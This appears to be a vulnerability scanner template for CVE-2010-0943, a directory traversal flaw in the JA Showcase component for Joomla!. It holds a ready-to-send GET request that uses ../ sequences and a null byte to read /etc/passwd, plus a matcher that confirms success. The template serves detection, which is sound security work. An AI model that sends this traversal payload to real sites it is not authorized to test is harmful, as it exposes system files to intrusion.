id: CVE-2010-0943 info: name: Joomla! Component com_jashowcase - Directory Traversal author: daffainfo severity: high description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11090 - https://www.cvedetails.com/cve/CVE-2010-0943 tags: cve,cve2010,joomla,lfi classification: cve-id: CVE-2010-0943 requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" - type: status status: - 200 # Enhanced by mp on 2022/02/13